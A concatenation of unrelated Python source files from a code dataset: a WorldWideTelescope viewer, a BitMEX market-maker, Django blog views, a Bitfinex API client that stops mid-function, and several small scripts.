    url="http://pault.ag/",
    platforms=['any'],
)
| StarcoderdataPython |
1637029 | <reponame>jsub1/glue-wwt<gh_stars>0
"""Base WWT data viewer implementation, generic over Qt and Jupyter backends."""
from __future__ import absolute_import, division, print_function
from glue.core.coordinates import WCSCoordinates
from .image_layer import WWTImageLayerArtist
from .table_layer import WWTTableLayerArtist
from .viewer_state import WWTDataViewerState
__all__ = ['WWTDataViewerBase']
class WWTDataViewerBase(object):
    """Base WWT data viewer, generic over the Qt and Jupyter backends.

    Subclasses must implement ``_initialize_wwt`` to create the backend
    widget. ``self.state`` (a WWTDataViewerState) is expected to be set up
    by the glue viewer machinery before ``__init__`` runs — TODO confirm.
    """
    LABEL = 'WorldWideTelescope (WWT)'
    # Backend-specific WWT client; populated by the subclass in _initialize_wwt().
    _wwt = None
    _state_cls = WWTDataViewerState
    def __init__(self):
        self._initialize_wwt()
        self._wwt.actual_planet_scale = True
        self.state.imagery_layers = list(self._wwt.available_layers)
        # Re-sync the WWT widget whenever any state attribute changes.
        self.state.add_global_callback(self._update_wwt)
        self._update_wwt(force=True)
    def _initialize_wwt(self):
        raise NotImplementedError('subclasses should set _wwt here')
    def _update_wwt(self, force=False, **kwargs):
        """Push changed state attributes to the WWT widget.

        ``kwargs`` holds the names of the attributes that changed; with
        ``force=True`` every setting is pushed regardless.
        """
        if force or 'mode' in kwargs:
            self._wwt.set_view(self.state.mode)
            # Only show SDSS data when in Universe mode
            self._wwt.solar_system.cosmos = self.state.mode == 'Universe'
            # Only show local stars when not in Universe or Milky Way mode
            self._wwt.solar_system.stars = self.state.mode not in ['Universe', 'Milky Way']
        if force or 'foreground' in kwargs:
            self._wwt.foreground = self.state.foreground
        if force or 'background' in kwargs:
            self._wwt.background = self.state.background
        if force or 'foreground_opacity' in kwargs:
            self._wwt.foreground_opacity = self.state.foreground_opacity
        if force or 'galactic' in kwargs:
            self._wwt.galactic_mode = self.state.galactic
    def get_layer_artist(self, cls, **kwargs):
        "In this package, we must override to append the wwt_client argument."
        return cls(self.state, wwt_client=self._wwt, **kwargs)
    def get_data_layer_artist(self, layer=None, layer_state=None):
        """Pick the artist class for *layer*: image (2-D + WCS) or table (1-D)."""
        if len(layer.pixel_component_ids) == 2:
            if not isinstance(layer.coords, WCSCoordinates):
                raise ValueError('WWT cannot render image layer {}: it must have WCS coordinates'.format(layer.label))
            cls = WWTImageLayerArtist
        elif layer.ndim == 1:
            cls = WWTTableLayerArtist
        else:
            raise ValueError('WWT does not know how to render the data of {}'.format(layer.label))
        return cls(self.state, wwt_client=self._wwt, layer=layer, layer_state=layer_state)
    def get_subset_layer_artist(self, layer=None, layer_state=None):
        # At some point maybe we'll use different classes for this?
        return self.get_data_layer_artist(layer=layer, layer_state=layer_state)
| StarcoderdataPython |
21243 | <reponame>Quant-Network/sample-market-maker
from __future__ import absolute_import
from time import sleep
import sys
from datetime import datetime
from os.path import getmtime
import random
import requests
import atexit
import signal
import logging
from market_maker.bitmex import BitMEX
from market_maker.settings import settings
from market_maker.utils import log, constants, errors, math
# Used for reloading the bot - saves modified times of key files
import os
watched_files_mtimes = [(f, getmtime(f)) for f in settings.WATCHED_FILES]
class ExchangeInterface:
    """Thin wrapper around the BitMEX client: symbol selection, order
    management, and portfolio/delta queries used by the order manager."""
    def __init__(self):
        self.logger = logging.getLogger('root')
        # The traded symbol can be overridden by the first CLI argument.
        if len(sys.argv) > 1:
            self.symbol = sys.argv[1]
        else:
            self.symbol = settings.SYMBOL
        self.bitmex = BitMEX(base_url=settings.BASE_URL, symbol=self.symbol,
                             apiKey=settings.BITMEX_API_KEY, apiSecret=settings.BITMEX_API_SECRET,
                             orderIDPrefix=settings.ORDERID_PREFIX, postOnly=settings.POST_ONLY,
                             timeout=settings.TIMEOUT)
    def cancel_order(self, order):
        """Cancel a single order, retrying (with a pause) on ValueError."""
        tickLog = self.get_instrument()['tickLog']
        self.logger.info("Canceling: %s %d @ %.*f" % (order['side'], order['orderQty'], tickLog, order['price']))
        while True:
            try:
                self.bitmex.cancel(order['orderID'])
                sleep(settings.API_REST_INTERVAL)
            except ValueError as e:
                self.logger.info(e)
                sleep(settings.API_ERROR_INTERVAL)
            else:
                break
    def cancel_all_orders(self):
        """Cancel every open order on the account for this connection."""
        self.logger.info("Resetting current position. Canceling all existing orders.")
        tickLog = self.get_instrument()['tickLog']
        # In certain cases, a WS update might not make it through before we call this.
        # For that reason, we grab via HTTP to ensure we grab them all.
        orders = self.bitmex.http_open_orders()
        for order in orders:
            self.logger.info("Canceling: %s %d @ %.*f" % (order['side'], order['orderQty'], tickLog, order['price']))
        if len(orders):
            self.bitmex.cancel([order['orderID'] for order in orders])
        sleep(settings.API_REST_INTERVAL)
    def get_portfolio(self):
        """Build a per-symbol summary (qty, future type, multiplier, prices)
        for every contract listed in settings.CONTRACTS."""
        contracts = settings.CONTRACTS
        portfolio = {}
        for symbol in contracts:
            position = self.bitmex.position(symbol=symbol)
            instrument = self.bitmex.instrument(symbol=symbol)
            # Classify the contract so calc_delta() can pick the right formula.
            if instrument['isQuanto']:
                future_type = "Quanto"
            elif instrument['isInverse']:
                future_type = "Inverse"
            elif not instrument['isQuanto'] and not instrument['isInverse']:
                future_type = "Linear"
            else:
                raise NotImplementedError("Unknown future type; not quanto or inverse: %s" % instrument['symbol'])
            # Normalize the contract multiplier into settlement-currency terms.
            if instrument['underlyingToSettleMultiplier'] is None:
                multiplier = float(instrument['multiplier']) / float(instrument['quoteToSettleMultiplier'])
            else:
                multiplier = float(instrument['multiplier']) / float(instrument['underlyingToSettleMultiplier'])
            portfolio[symbol] = {
                "currentQty": float(position['currentQty']),
                "futureType": future_type,
                "multiplier": multiplier,
                "markPrice": float(instrument['markPrice']),
                "spot": float(instrument['indicativeSettlePrice'])
            }
        return portfolio
    def calc_delta(self):
        """Calculate currency delta for portfolio"""
        portfolio = self.get_portfolio()
        spot_delta = 0
        mark_delta = 0
        # Delta formula depends on the contract type (see get_portfolio()).
        for symbol in portfolio:
            item = portfolio[symbol]
            if item['futureType'] == "Quanto":
                spot_delta += item['currentQty'] * item['multiplier'] * item['spot']
                mark_delta += item['currentQty'] * item['multiplier'] * item['markPrice']
            elif item['futureType'] == "Inverse":
                spot_delta += (item['multiplier'] / item['spot']) * item['currentQty']
                mark_delta += (item['multiplier'] / item['markPrice']) * item['currentQty']
            elif item['futureType'] == "Linear":
                spot_delta += item['multiplier'] * item['currentQty']
                mark_delta += item['multiplier'] * item['currentQty']
        basis_delta = mark_delta - spot_delta
        delta = {
            "spot": spot_delta,
            "mark_price": mark_delta,
            "basis": basis_delta
        }
        return delta
    def get_delta(self, symbol=None):
        """Current position size (contracts) for *symbol* (default: ours)."""
        if symbol is None:
            symbol = self.symbol
        return self.get_position(symbol)['currentQty']
    def get_instrument(self, symbol=None):
        if symbol is None:
            symbol = self.symbol
        return self.bitmex.instrument(symbol)
    def get_margin(self):
        return self.bitmex.funds()
    def get_orders(self):
        return self.bitmex.open_orders()
    def get_highest_buy(self):
        """Our highest open buy order, or a -2**32 price sentinel if none."""
        buys = [o for o in self.get_orders() if o['side'] == 'Buy']
        if not len(buys):
            return {'price': -2**32}
        # NOTE(review): buys is already known non-empty here, so the "or []"
        # and the trailing fallback below are dead code.
        highest_buy = max(buys or [], key=lambda o: o['price'])
        return highest_buy if highest_buy else {'price': -2**32}
    def get_lowest_sell(self):
        """Our lowest open sell order, or a 2**32 price sentinel if none."""
        sells = [o for o in self.get_orders() if o['side'] == 'Sell']
        if not len(sells):
            return {'price': 2**32}
        # NOTE(review): as in get_highest_buy(), the fallback below is dead code.
        lowest_sell = min(sells or [], key=lambda o: o['price'])
        return lowest_sell if lowest_sell else {'price': 2**32}  # ought to be enough for anyone
    def get_position(self, symbol=None):
        if symbol is None:
            symbol = self.symbol
        return self.bitmex.position(symbol)
    def get_ticker(self, symbol=None):
        if symbol is None:
            symbol = self.symbol
        return self.bitmex.ticker_data(symbol)
    def is_open(self):
        """Check that websockets are still open."""
        return not self.bitmex.ws.exited
    def is_stable(self):
        """Check that websockets are still stable for use."""
        return self.bitmex.ws.is_client_stable()
    def check_market_open(self):
        # NOTE(review): a "Closed" state is deliberately tolerated here — only
        # states other than Open/Closed raise. Confirm this is intended.
        instrument = self.get_instrument()
        if instrument["state"] != "Open" and instrument["state"] != "Closed":
            raise errors.MarketClosedError("The instrument %s is not open. State: %s" %
                                           (self.symbol, instrument["state"]))
    def check_if_orderbook_empty(self):
        """This function checks whether the order book is empty"""
        instrument = self.get_instrument()
        if instrument['midPrice'] is None:
            raise errors.MarketEmptyError("Orderbook is empty, cannot quote")
    def amend_bulk_orders(self, orders):
        return self.bitmex.amend_bulk_orders(orders)
    def create_bulk_orders(self, orders):
        return self.bitmex.create_bulk_orders(orders)
    def cancel_bulk_orders(self, orders):
        return self.bitmex.cancel([order['orderID'] for order in orders])
class OrderManager:
    """Drives the market-making loop: connects to the exchange, keeps local
    quoting state, and converges desired orders with the live order book.

    Abstract base class — subclasses must implement print_status(),
    place_orders(), prepare_order(), exit(), run_loop() and restart().
    """
    def __init__(self):
        self.logger = logging.getLogger('root')
        self.exchange = ExchangeInterface()
        # Once exchange is created, register exit handler that will always cancel orders
        # on any error.
        atexit.register(self.exit)
        signal.signal(signal.SIGTERM, self.exit)
        self.logger.info("Using symbol %s." % self.exchange.symbol)
        self.logger.info("Order Manager initializing, connecting to BitMEX. Live run: executing real trades.")
        self.start_time = datetime.now()
        self.instrument = self.exchange.get_instrument()
        self.starting_qty = self.exchange.get_delta()
        self.running_qty = self.starting_qty
        self.reset()
    def reset(self):
        """Cancel everything, re-check invariants, then re-place our quotes."""
        self.exchange.cancel_all_orders()
        self.sanity_check()
        self.print_status()
        # Create orders and converge.
        self.place_orders()
    def print_status(self):
        """Print the current MM status."""
        raise NotImplementedError("This method has not been implemented.")
    def get_ticker(self):
        """Fetch the ticker and cache the best bid/ask as our quote anchors."""
        ticker = self.exchange.get_ticker()
        # Set up our buy & sell positions
        self.start_position_buy = ticker["buy"]
        self.start_position_sell = ticker["sell"]
        return ticker
    def get_price_offset(self, index):
        """Given an index (1, -1) return the price for that side of the book.
        -1 is a buy, 1 is a sell."""
        # Offset mode: We define a naive quoting and execution method which is basically try to chase the best bids.
        start_position = self.start_position_buy if index < 0 else self.start_position_sell
        return math.toNearest(start_position, self.instrument['tickSize'])
    ###
    # Orders
    ###
    def place_orders(self):
        """Create order items for use in convergence."""
        raise NotImplementedError("This method has not been implemented.")
    def prepare_order(self, index):
        """Create an order object."""
        raise NotImplementedError("This method has not been implemented.")
    def converge_orders(self, buy_orders, sell_orders):
        """Converge the orders we currently have in the book with what we want to be in the book.
        This involves amending any open orders and creating new ones if any have filled completely.
        We start from the closest orders outward."""
        tickLog = self.exchange.get_instrument()['tickLog']
        to_amend = []
        to_create = []
        to_cancel = []
        buys_matched = 0
        sells_matched = 0
        existing_orders = self.exchange.get_orders()
        # Check all existing orders and match them up with what we want to place.
        # If there's an open one, we might be able to amend it to fit what we want.
        for order in existing_orders:
            try:
                if order['side'] == 'Buy':
                    desired_order = buy_orders[buys_matched]
                    buys_matched += 1
                else:
                    desired_order = sell_orders[sells_matched]
                    sells_matched += 1
                # Found an existing order. Do we need to amend it?
                if desired_order['orderQty'] != order['orderQty'] or desired_order['price'] != order['price']:
                    to_amend.append({'orderID': order['orderID'], 'orderQty': desired_order['orderQty'],
                                     'price': desired_order['price'], 'side': order['side']})
            except IndexError:
                # Will throw if there isn't a desired order to match. In that case, cancel it.
                to_cancel.append(order)
        # Anything we wanted but could not match to an open order must be created.
        while buys_matched < len(buy_orders):
            to_create.append(buy_orders[buys_matched])
            buys_matched += 1
        while sells_matched < len(sell_orders):
            to_create.append(sell_orders[sells_matched])
            sells_matched += 1
        if len(to_amend) > 0:
            for amended_order in reversed(to_amend):
                reference_order = [o for o in existing_orders if o['orderID'] == amended_order['orderID']][0]
                self.logger.info("Amending %4s: %d @ %.*f to %d @ %.*f (%+.*f)" % (
                    amended_order['side'],
                    reference_order['leavesQty'], tickLog, reference_order['price'],
                    (amended_order['orderQty'] - reference_order['cumQty']), tickLog, amended_order['price'],
                    tickLog, (amended_order['price'] - reference_order['price'])
                ))
                # This can fail if an order has closed in the time we were processing.
                # The API will send us `invalid ordStatus`, which means that the order's status (Filled/Canceled)
                # made it not amendable.
                # If that happens, we need to catch it and re-tick.
            try:
                self.exchange.amend_bulk_orders(to_amend)
            except requests.exceptions.HTTPError as e:
                errorObj = e.response.json()
                if errorObj['error']['message'] == 'Invalid ordStatus':
                    # FIX: Logger.warn() is a deprecated alias of warning();
                    # also matches the warning() call used in sanity_check().
                    self.logger.warning("Amending failed. Waiting for order data to converge and retrying.")
                    sleep(0.5)
                    return self.place_orders()
                else:
                    self.logger.error("Unknown error on amend: %s." % errorObj)
        if len(to_create) > 0:
            self.logger.info("Creating %d orders:" % (len(to_create)))
            for order in reversed(to_create):
                self.logger.info("%4s %d @ %.*f" % (order['side'], order['orderQty'], tickLog, order['price']))
            self.exchange.create_bulk_orders(to_create)
        # Could happen if we exceed a delta limit
        if len(to_cancel) > 0:
            self.logger.info("Canceling %d orders:" % (len(to_cancel)))
            for order in reversed(to_cancel):
                self.logger.info("%4s %d @ %.*f" % (order['side'], order['leavesQty'], tickLog, order['price']))
            self.exchange.cancel_bulk_orders(to_cancel)
    ###
    # Sanity
    ##
    def sanity_check(self):
        """Perform checks before placing orders."""
        # Check if OB is empty - if so, can't quote.
        self.exchange.check_if_orderbook_empty()
        # Ensure market is still open.
        self.exchange.check_market_open()
        # Get ticker, which sets price offsets and prints some debugging info.
        ticker = self.get_ticker()
        # Exchange websockets stability check:
        if not self.check_exchange_state_stability():
            self.logger.warning("Sanity exchange websockets stability check failed, exchange data is no longer reliable. Restarting...")
            self.restart()
        # Sanity check: our first buy must be below the ask and first sell above the bid.
        if self.get_price_offset(-1) >= ticker["sell"] or self.get_price_offset(1) <= ticker["buy"]:
            self.logger.error("Buy: %s, Sell: %s" % (self.start_position_buy, self.start_position_sell))
            self.logger.error("First buy position: %s\nBitMEX Best Ask: %s\nFirst sell position: %s\nBitMEX Best Bid: %s" %
                              (self.get_price_offset(-1), ticker["sell"], self.get_price_offset(1), ticker["buy"]))
            self.logger.error("Sanity check failed, exchange data is inconsistent")
            self.restart()
    ###
    # Helpers
    ###
    def determine_contracts_amt(self, satoshi_amt, price):
        '''Calculate the number of contracts for a given satoshi amount and contract price. Note: the minimum returned value is 1.'''
        return max(1, int((satoshi_amt/constants.XBt_TO_XBT) * price))
    ###
    # Running
    ###
    def check_file_change(self):
        """Restart if any files we're watching have changed."""
        for f, mtime in watched_files_mtimes:
            if getmtime(f) > mtime:
                self.restart()
    def check_connection(self):
        """Ensure the WS connections are still open."""
        return self.exchange.is_open()
    def check_exchange_state_stability(self):
        """Ensure the WS is still stable for use."""
        return self.exchange.is_stable()
    def exit(self):
        raise NotImplementedError("This method has not been implemented.")
    def run_loop(self):
        raise NotImplementedError("This method has not been implemented.")
    def restart(self):
        raise NotImplementedError("This method has not been implemented.")
#
# Helpers
#
def XBt_to_XBT(XBt):
    """Convert an amount in satoshis (XBt) to bitcoin (XBT)."""
    satoshis_per_xbt = constants.XBt_TO_XBT
    return float(XBt) / satoshis_per_xbt
def cost(instrument, quantity, price):
    """Absolute cost of *quantity* contracts of *instrument* at *price*.

    A non-negative multiplier means a linear/quanto-style payoff
    (multiplier * price per contract); a negative multiplier means an
    inverse contract (multiplier / price per contract).
    """
    multiplier = instrument["multiplier"]
    if multiplier >= 0:
        per_contract = multiplier * price
    else:
        per_contract = multiplier / price
    return abs(quantity * per_contract)
def margin(instrument, quantity, price):
    """Initial margin required for *quantity* contracts at *price*."""
    position_cost = cost(instrument, quantity, price)
    return instrument["initMargin"] * position_cost
1735566 | <reponame>anton-musrevinu/sharpNAR
#Do enumeration benchmarks
from benchmarks.Benchmarks import Benchmark
from sharpsmt.Manager import Manager
if __name__=='__main__':
    # CSV describing which enumeration benchmark instances to run.
    pathC = './../mcbenchmarks/algorithms_specs/enumeration_input.csv'
    # Benchmark(False, True): flag semantics are defined by Benchmark.__init__ — TODO confirm.
    benchmark = Benchmark(False,True)
    # 3 * 60 * 60 — presumably a 3-hour limit in seconds; verify against the Benchmark API.
    benchmark.benchmarkModelCounting(pathC,3 * 60 * 60,1)
72367 | #!/usr/bin/env python
#
# A library that provides a Gemynd AI bot interface
# Copyright (C) 2016
# Gemynd AI Team <<EMAIL>>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
from telegramapi.api import *
# Package metadata (the author address was anonymized in this dump).
__author__ = '<EMAIL>'
__version__ = '0.1alpha'
| StarcoderdataPython |
3209591 | <gh_stars>10-100
import os
import shutil
import re
import sys
if __name__ == '__main__':
    # CLI: argv[1] indexes into `layers`, argv[2] selects the pruning-block
    # subdirectory, e.g. layer 0 / block 3 -> "2a_3/snapshot/".
    compress_layer = int(sys.argv[1])
    compress_block = int(sys.argv[2])
    layers = ['2a', '2b', '2c', '3a', '3b', '3c', '3d', '4a', '4b', '4c', '4d', '4e', '4f', '5a', '5b', '5c']
    FileNames = os.listdir(layers[compress_layer]+'_'+str(compress_block)+'/snapshot/')
    # Find the snapshot with the highest iteration number embedded in its
    # "_iter_<N>.caffemodel" filename.
    max_value = 0
    for i in range(len(FileNames)):
        name = re.findall(r"_iter_(.+?).caffemodel", FileNames[i])
        if len(name) > 0:
            if int(name[0]) > max_value:
                max_value = int(name[0])
    # NOTE(review): if no filename matches, this copies "_iter_0.caffemodel",
    # which will not exist and makes shutil.copyfile raise FileNotFoundError.
    filename = layers[compress_layer]+'_'+str(compress_block)+'/snapshot/_iter_'+str(max_value)+".caffemodel"
    shutil.copyfile(filename, "model.caffemodel")
| StarcoderdataPython |
1667504 | <reponame>Sem8/js-mock-interview-code-challenges<gh_stars>0
# My own solution: Stock prices to find maximum profit but you have to buy first before sell
# '''Pseudocode: O(n^2) solution with nested for loop
# 1. Initialize a variable called max profit and set it equal to the difference between 1st and 2nd element prices in the array.
# 2. Loop through the array with index i starting at 0 and ending at 2nd to last element.
# 3. Make an inner loop inside outer loop and start at index after the outer loop's index of i and ending at the last element.
# 4. Make an if statement of if element at inner loops index minus element at outer loop's index is greater than the initial
# max_profit that was set then re-assign max profit to the current difference of element at current inner loop index minus element at outer
# loop index.
# 5. return final max profit.
# '''
# def stock_prices(arr):
# max_profit = arr[1] - arr[0]
# for i in range(0, len(arr) - 1):
# for j in range(i+1, len(arr)):
# if arr[j] - arr[i] > max_profit:
# max_profit = arr[j] - arr[i]
# return max_profit
# My own solution for stock prices with O(2n) time complexity:
'''Pseudocode: Solution with 1 for loop O(2n) = ~O(n) time complexity:
1. Set variable called initial_buy to 1st array element
2. set variable called initial_sell to 2nd array element
3. Loop through the array starting from 1 all the way to end.
4. Make if statement, check if current element at current index is more than initial_sell then reset initial_sell to that variable.
5. Make another for loop outside the previous for loop (not nested inner for loop) starting at index 1 all the way to end of array.
6. Make if statement inside the above 2nd for loop to check if current element at current index is less than initial_buy (from 1st array element)
and that the index of this current element at current index is at a lower index than the index of the updated initial_sell value from the array.
If so, reset initial_buy to this current array element at current index that meets this condition.
7. Return the difference between the updated initial_sell minus initial_buy
'''
# def stock_prices(arr):
# initial_buy = arr[0]
# initial_sell = arr[1]
# for i in range(1, len(arr)):
# if arr[i] > initial_sell:
# initial_sell = arr[i]
# for i in range(1, len(arr)):
# if (arr[i] < initial_buy and arr.index(arr[i]) < arr.index(initial_sell)):
# initial_buy = arr[i]
# # print('initial_sell', initial_sell)
# # print('initial_buy', initial_buy)
# return initial_sell - initial_buy
# Optimized solution with O(n) time complexity
'''Pseudocode: Just 1 for loop
1. Set variable called min_price to the first array elment
2. Set variable called max_profit to the the 1st array element minus 2nd array element.
3. Make for loop, starting at index 0 all the way to last element.
4. Inside for loop, update max_profit value using max method by comparing initial max_profit value vs. the current price at current element minus
min_price value from initial 1st array element.
5. Still inside for loop, update the min_price variable using min method comparing initial min_price from 1st array element vs. current array
element at current index.
6. Return max_profit.
'''
def stock_prices(arr):
    """Return the best buy-before-sell profit obtainable from *arr*.

    Single pass: track the cheapest price seen so far and the best gain
    achievable by selling at the current price. For a strictly falling
    series the result is negative (the least bad forced trade).
    Requires at least two prices.
    """
    cheapest = arr[0]
    best = arr[1] - arr[0]
    for price in arr[1:]:
        gain = price - cheapest
        if gain > best:
            best = gain
        if price < cheapest:
            cheapest = price
    return best
# Demo run: the expected result for each call is noted in its trailing comment.
print(stock_prices([10, 7, 5, 8, 11, 9])) # 6
print(stock_prices([100, 90, 80, 50, 20, 10])) # -10
print(stock_prices([1050, 270, 1540, 3800, 2])) # 3530
print(stock_prices([100, 55, 4, 98, 10, 18, 90, 95, 43, 11, 47, 67, 89, 42, 49, 79])) # 94
| StarcoderdataPython |
3299403 | <reponame>rafaelapcruz/Awesome_Python_Scripts
import re
def vowel_remover(string):
    """Print *string* with all ASCII vowels removed, without a newline."""
    # One substitution pass is equivalent to printing every non-vowel run.
    print(re.sub("[aeiouAEIOU]", "", string), end='')
# Script entry: prompt for a line and echo it back without vowels.
input_text = input('Enter input text: ')
vowel_remover(input_text)
3297424 | <filename>blog/views.py
from django.shortcuts import render, redirect
from django import forms
from django.conf import settings
from django.core.mail import send_mail
from django_journal_project.settings import EMAIL_ADDRESS, EMAIL_PASSWORD
from .models import Post
import os
from django.core.mail import EmailMessage
# from .models import Tag
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.views.generic import ListView, TemplateView, DetailView, CreateView, UpdateView, DeleteView
from django.urls import reverse
from django.contrib import messages
from django.core.mail import BadHeaderError
from django.http import HttpResponse, HttpResponseRedirect
from .forms import ContactForm
from django.contrib import messages
import smtplib
from smtplib import *
def home(request):
    """Render the blog home page with every post (no pagination)."""
    context = {
        'posts': Post.objects.all(),
    }
    return render(request, "blog/home.html", context)

def about(request):
    """Render the static about page."""
    return render(request, "blog/about.html")
def contactView(request):
    """Contact page: GET shows an empty form, POST validates and emails it.

    On success flashes a message and redirects to 'site-help'; SMTP or
    header failures return a plain HttpResponse instead of re-rendering.
    """
    if request.method == 'GET':
        form = ContactForm()
    else:
        form = ContactForm(request.POST)
        if form.is_valid():
            subject = form.cleaned_data['subject']
            from_email = form.cleaned_data['from_email']
            message = form.cleaned_data['message']
            try:
                # The visitor's address is embedded in the subject line; the
                # mail is delivered to the site's own configured inbox.
                send_mail(subject+" from: "+from_email, message, from_email,[settings.EMAIL_HOST_USER])
                messages.success(request, "Thank you for contacting us. Your email has been sent.")
                return redirect('site-help')
            except SMTPResponseException as e:
                # NOTE(review): `e` is unused; consider logging the SMTP code.
                return HttpResponse('Email contact is not functional currently. Apologies.')
            except BadHeaderError:
                return HttpResponse('Invalid header found.')
    # Falls through for GET requests and invalid POSTs.
    return render(request, "blog/help.html", {'form': form})
def successView(request):
    """Plain-text confirmation for a submitted contact message."""
    return HttpResponse('Success! Thank you for your message.')

def explore(request):
    """Render the static explore page."""
    return render(request, "blog/explore.html")
def SearchResults(request):
    """Render posts matching the ``searched`` GET parameter.

    A post matches when the query equals (case-insensitively) any
    whitespace-separated word of its title or body, or equals the author's
    username exactly (case-sensitive), mirroring the original behaviour.
    Non-GET requests render an empty results page.
    """
    if request.method != "GET":
        return render(request, "blog/search_results.html", {})
    # Robustness fix: a missing ?searched= parameter used to crash with
    # AttributeError on None.lower(); treat it as an empty query instead.
    searched = request.GET.get('searched') or ''
    needle = searched.lower()

    def _matches(post):
        # Whole-word membership tests replace the original nested
        # flag-setting loops; semantics are identical.
        if needle in post.title.lower().split():
            return True
        if needle in post.post_content.lower().split():
            return True
        # Author comparison is intentionally case-sensitive.
        return post.author.username == searched

    results = [post for post in Post.objects.all() if _matches(post)]
    return render(request, "blog/search_results.html",
                  {'searched': searched, 'post_results': results})
# class MultipleModelView(TemplateView):
# template_name = 'blog/home.html'
# def get_context_data(self, **kwargs):
# context = super(MultipleModelView, self).get_context_data(**kwargs)
# context['posts'] = Post.objects.all().order_by('-date_posted')
# context['tags'] = Tag.objects.all()
# return context
class PostListView(ListView):
    """Home page as a class-based view: all posts, newest first."""
    #MultipleModelsListView(ListView) - add in Tag, look up context object name multiple too,
    #feed into home.html
    model = Post
    template_name = 'blog/home.html'
    context_object_name = 'posts'
    ordering = ['-date_posted']

class PostUserListView(ListView):
    """All posts by the user named in the URL kwarg ``username``."""
    model = Post
    def get_queryset(self):
        # Resolve the username to an author id by scanning existing posts.
        # NOTE(review): if the user has no posts, `pk_value` is never bound
        # and the filter() call raises UnboundLocalError; resolving via the
        # User model would be safer.
        posts = Post.objects.all()
        for post in posts:
            if post.author.username==self.kwargs['username']:
                pk_value=post.author.id
                break
        queryset = Post.objects.all().filter(author=pk_value)
        queryset=queryset.order_by('-date_posted')
        return queryset
    template_name = 'blog/user_blog.html'

class PostDetailView(DetailView):
    """Single-post page."""
    model = Post
    template_name = 'blog/post_detail.html'
    # def get_context_data(self, **kwargs):
    #     context = super(PostDetailView, self).get_context_data(**kwargs)
    #     context['posts'] = Post.objects.all().order_by('-date_posted')
    #     context['tags'] = Tag.objects.all()
    #     return context

class PostCreateView(LoginRequiredMixin, CreateView):
    """Authenticated post creation; the author is forced to request.user."""
    model = Post
    fields = ['title', 'post_content']
    def form_valid(self, form):
        form.instance.author = self.request.user
        return super().form_valid(form)
class PostUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):
    """Authenticated post edit, restricted to the post's author."""
    model = Post
    fields = ['title', 'post_content']
    def form_valid(self, form):
        # Re-stamp the author so ownership cannot be changed via an edit.
        form.instance.author = self.request.user
        return super().form_valid(form)
    def test_func(self):
        # UserPassesTestMixin gate: only the post's author may edit.
        post=self.get_object()
        if self.request.user == post.author:
            return True
        return False
# NOTE(review): this class is an exact duplicate of PostUpdateView defined
# immediately above; Python simply rebinds the name, so the earlier
# definition is dead code. One of the two copies should be deleted.
class PostUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):
    model = Post
    fields = ['title', 'post_content']
    def form_valid(self, form):
        form.instance.author = self.request.user
        return super().form_valid(form)
    def test_func(self):
        post=self.get_object()
        if self.request.user == post.author:
            return True
        return False
class PostDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):
    """Author-only post deletion; flashes a message and returns to profile."""
    model = Post
    def form_valid(self, form):
        form.instance.author = self.request.user
        return super().form_valid(form)
    def test_func(self):
        # Only the post's author may delete it.
        post=self.get_object()
        if self.request.user == post.author:
            return True
        return False
    def get_success_url(self):
        messages.add_message(self.request, messages.INFO, 'Post deleted.')
        return reverse('profile')
| StarcoderdataPython |
1786025 | <reponame>assassinen/coursera_mfti_python<filename>bitfinex/api/data.py
import time
import requests as requests
from configparser import ConfigParser
class Ticker:
    """Fetch ticker data from the Bitfinex public REST API.

    The URL template and the positional field names of the JSON response
    come from config.ini ([ticker] url / responce_key).
    """

    def __init__(self):
        config = ConfigParser()
        config.read_file(open('config.ini'))
        self.url = config['ticker']['url']
        # Field names matching the positional JSON array Bitfinex returns.
        self.key = config['ticker']['responce_key'].split(',\n')

    def get_tiker(self, symbol):
        """Return a field-name -> value dict for *symbol*, or [] on failure.

        *symbol* is an iterable of symbol strings joined with commas into
        the URL template.
        """
        result = []
        try:
            response = requests.get(self.url.format(','.join(symbol)))
            if response.status_code == 200:
                result = dict(zip(self.key, response.json()))
        except Exception:
            # Fixed: was a bare `except:`, which also swallowed
            # KeyboardInterrupt/SystemExit. Network/JSON errors still
            # degrade to the empty result.
            return result
        return result

    def get_last_price(self, symbol='tBTCUSD'):
        """Poll get_tiker until a LAST_PRICE field appears and return it.

        NOTE(review): this retries forever with no backoff or attempt cap,
        so it can block indefinitely while the API is unreachable.
        """
        symbol = symbol if isinstance(symbol, tuple) else (symbol,)
        result = self.get_tiker(symbol)
        while 'LAST_PRICE' not in result:
            result = self.get_tiker(symbol)
        self.last_price = result['LAST_PRICE']
        return self.last_price
class Candles:
    """Download OHLCV candles from the Bitfinex public REST API.

    URL template and field names come from config.ini ([candles] section).
    """

    def __init__(self):
        config = ConfigParser()
        config.read_file(open('config.ini'))
        self.url = config['candles']['url']
        self.key = config['candles']['responce_key'].split(',\n')
        # Bitfinex caps candle responses at 1000 entries per request.
        self.limit = 1000

    def time_to_unix_time(self, human_time):
        """Parse 'YYYY-MM-DD HH:MM:SS' (local time) to a unix timestamp."""
        return int(time.mktime(time.strptime(human_time, '%Y-%m-%d %H:%M:%S')))

    def unix_time_to_time(self, unix_time):
        """Format a unix timestamp as an RFC-2822-style time string.

        NOTE(review): the string hardcodes "+0000" while formatting with
        localtime(), so non-UTC machines label local time as UTC -- confirm
        whether gmtime() was intended before changing callers.
        """
        return time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.localtime(unix_time))

    def get_duration_candle(self, time_frame):
        """Return the duration in seconds of one candle, e.g. '5m', '2h', '1D'."""
        multiplier = {'m': 60, 'h': 3600, 'D': 86400}
        return int(time_frame[0:-1]) * multiplier[time_frame[-1]]

    def get_candle(self, symbol, limit, time_frame, start, end):
        """Fetch one page of candles (start/end in seconds, sent as ms).

        Returns a list of field dicts on success, a one-element sentinel
        list for an empty page, and False on API error or any exception.
        """
        request = self.url.format(limit=limit, time_frame=time_frame, symbol=symbol, start=start*1000, end=end*1000)
        try:
            response = requests.get(request)
            if response.status_code == 200:
                result = [dict(zip(self.key, item)) for item in response.json()]
